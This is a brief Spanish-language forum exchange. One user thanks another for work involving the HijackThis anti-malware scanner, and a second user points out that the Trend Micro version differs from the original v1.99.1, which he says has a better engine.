exelente trabajo ahora si podremos usar al maximo el hijack  this
gracias
saludos cker

Parcer0

#9
eesa version the HijackThis es la the Trend Micro Inc.

Esta es la original y tiene un engine mucho mejor.
  HijackThis v1.99.1